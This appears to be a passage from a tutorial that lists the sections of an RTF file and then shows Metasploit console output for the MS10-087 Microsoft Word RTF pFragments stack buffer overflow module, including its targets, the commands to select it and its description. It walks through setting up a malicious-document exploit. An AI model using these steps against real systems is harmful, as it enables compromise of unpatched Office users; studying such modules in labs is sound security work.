Contents of an RTF file Header RTF Version Character Set Unicode RTF Default Fonts and Languages Theme Data Color Scheme Mapping Font Table File Table Color Table Default Properties Style Sheet List Tables Paragraph Group Properties Revision Marks User Protection Information Document Area Information Group Read-Only Password Protection XML Namespace Table Document Formatting Properties Mail Merge Section Text Paragraph Text Mathematics Character Text Document Variables Bookmarks Protection Exceptions Pictures Custom XML Tags Objects Drawing Objects Footnotes Comments (Annotations) Fields Index Entries Table of Contents Entries Bidirectional Language Support
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great No MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) 1 \_ target: Automatic . . . . 2 \_ target: Microsoft Office 2002 SP3 English on Windows XP SP3 English . . . . 3 \_ target: Microsoft Office 2003 SP3 English on Windows XP SP3 English . . . . 4 \_ target: Microsoft Office 2007 SP0 English on Windows XP SP3 English . . . . 5 \_ target: Microsoft Office 2007 SP0 English on Windows Vista SP0 English . . . . 6 \_ target: Microsoft Office 2007 SP0 English on Windows 7 SP0 English . . . . 7 \_ target: Crash Target for Debugging . . . .
Interact with a module by name or index. For example info 7, use 7 or use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof After interacting with a module you can manually set a TARGET with set TARGET 'Crash Target for Debugging'
调用该模块并查看模块详情
1 2
msf6 > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > info
Name: MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) Module: exploit/windows/fileformat/ms10_087_rtf_pfragments_bof Platform: Windows Arch: Privileged: No License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2010-11-09
Provided by: wushi of team509 unknown jduck <jduck@metasploit.com> DJ Manila Ice, Vesh, CA
Available targets: Id Name -- ---- => 0 Automatic 1 Microsoft Office 2002 SP3 English on Windows XP SP3 English 2 Microsoft Office 2003 SP3 English on Windows XP SP3 English 3 Microsoft Office 2007 SP0 English on Windows XP SP3 English 4 Microsoft Office 2007 SP0 English on Windows Vista SP0 English 5 Microsoft Office 2007 SP0 English on Windows 7 SP0 English 6 Crash Target for Debugging
Check supported: No
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.rtf yes The file name.
Description: This module exploits a stack-based buffer overflow in the handling of the 'pFragments' shape property within the Microsoft Word RTF parser. All versions of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the MS10-087 bulletin are vulnerable.
This module does not attempt to exploit the vulnerability via Microsoft Outlook.
The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting.
It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that Microsoft will confirm or deny this since Office 2000 has reached its support cycle end-of-life.